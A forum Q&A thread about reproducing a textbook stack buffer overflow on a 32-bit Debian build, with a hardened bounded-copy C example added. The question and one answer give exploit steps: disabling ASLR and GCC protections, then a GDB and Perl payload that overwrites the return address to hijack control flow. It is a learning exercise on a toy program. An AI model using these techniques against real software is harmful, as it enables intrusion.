How to check buffer overflow on a modern system?

I am now interested in learning how to perform buffer overflows. I made quite a few builds and realized how the stack works and how to implement buffer overflows in C. However, I ran into a rather difficult task trying to get GCC 4.9.1 to allow me to overflow the buffer correctly. I am running Debian Jessie.

Here is the tutorial I'm trying to complete, in section 2.2. I copied / pasted the C program that it provides, and I use the same Perl script that it uses, so everything is exactly the same as in its case (except for the system, of course).

These are the results that I get sequentially:

    ~/projects/buffer-overflow$ ls
    run.pl  test.c
    ~/projects/buffer-overflow$ sudo su
    root@wash # echo "0" > /proc/sys/kernel/randomize_va_space
    root@wash # exit
    exit
    ~/projects/buffer-overflow$ gcc -m32 -fno-stack-protector -zexecstack test.c
    ~/projects/buffer-overflow$ ./run.pl
    Address of foo = 0x804845b
    Address of bar = 0x80484a4
    My stack looks like:
    (nil)
    0xffffd4a8
    0xf7e58b2f
    0xf7fb3ac0
    0x8048657
    0xffffd494
    
    ABCDEFGHIJKLMNOPP@
    
    Now the stack looks like:
    0xffffd718
    0xffffd4a8
    0xf7e58b2f
    0xf7fb3ac0
    0x42418657
    0x46454443
+7
c gcc stack-overflow
2 answers

Because the Perl script is not particularly useful here (different systems will use different addresses), let's do it without a script ...

First of all, find the exact number of bytes needed to overwrite the return address. We can do this with GDB and Perl:

    (gdb) run `perl -e 'print "A" x 26';`
    Address of foo = 0x804845b
    Address of bar = 0x80484a5
    My stack looks like:
    0xf7fb1000
    0xffffdab8
    0xf7e44476
    0xf7fb1d60
    0x8048647
    0xffffdaa8
    
    AAAAAAAAAAAAAAAAAAAAAAAAAA
    
    Now the stack looks like:
    0xffffdcbb
    0xffffdab8
    0xf7e44476
    0xf7fb1d60
    0x41418647
    0x41414141
    
    Program received signal SIGSEGV, Segmentation fault.
    0x41414141 in ?? ()

As you can see, 26 bytes will overwrite EIP; therefore, replacing the last four "A" characters with the address of bar() (do not forget to put it in little-endian format), we should be successful:

    (gdb) run `perl -e 'print "A" x 22';``perl -e 'print "\xa5\x84\x04\x8"';`
    Address of foo = 0x804845b
    Address of bar = 0x80484a5
    My stack looks like:
    0xf7fb1000
    0xffffdab8
    0xf7e44476
    0xf7fb1d60
    0x8048647
    0xffffdaa8
    
    AAAAAAAAAAAAAAAAAAAAAA   
    
    Now the stack looks like:
    0xffffdcbb
    0xffffdab8
    0xf7e44476
    0xf7fb1d60
    0x41418647
    0x41414141
    Augh! I've been hacked!
    
    Program received signal SIGSEGV, Segmentation fault.
    0xffffdc06 in ?? ()

As you can see, we have successfully returned to the function bar().

+2
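The answer above works only because the tutorial's foo() copies argv[1] into a fixed stack buffer without checking its length, so the 26th byte lands on the saved return address. The following is an added example (not the tutorial's test.c and not the answerer's code) showing the hardened form of that copy: the buffer size BUF_SIZE is an assumption, and copy_bounded() and foo_hardened() are names introduced here. It refuses any input that does not fit, including the terminating NUL, so the oversized input that overwrote EIP above is rejected before anything is written past the buffer.

```c
#include <stdio.h>
#include <string.h>

/* Added example (not the tutorial's test.c). The tutorial's foo() copies
 * argv[1] into a stack buffer with no bounds check; copy_bounded() is the
 * hardened equivalent. BUF_SIZE is an assumed size for illustration. */
#define BUF_SIZE 16

/* Copy src into dst only if it fits, NUL included.
 * Returns 0 on success, -1 if the input was rejected. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t n = strlen(src);
    if (dst_size == 0 || n >= dst_size) {
        return -1;               /* refuse rather than write past dst */
    }
    memcpy(dst, src, n + 1);     /* n + 1 also copies the terminating NUL */
    return 0;
}

/* Mirrors the shape of the tutorial's foo(): a fixed stack buffer filled
 * from the command line, but with the copy bounded. Returns 0 when the
 * input was copied and -1 when it was rejected. */
int foo_hardened(const char *arg)
{
    char buf[BUF_SIZE];
    if (copy_bounded(buf, sizeof buf, arg) != 0) {
        fprintf(stderr, "input of %zu bytes rejected (buffer holds %zu)\n",
                strlen(arg), sizeof buf - 1);
        return -1;
    }
    printf("copied: %s\n", buf);
    return 0;
}

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 2;
    }
    return foo_hardened(argv[1]) == 0 ? 0 : 1;
}
```

Build it with the same `gcc -m32` line as in the question and pass the 26-byte string: the copy is refused and the saved return address is never touched. Note also that the question's command line disables two defences on purpose (`-fno-stack-protector` removes GCC's stack canary, which would otherwise abort the process with "stack smashing detected" when the overflow reaches the saved frame, and `-zexecstack` makes the stack executable); a production build should keep both defaults in place in addition to bounding the copy.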

I would try -fno-stack-protector-all (adding -all), and also the -O options; some optimizations are included in some -fxxx flags.

0
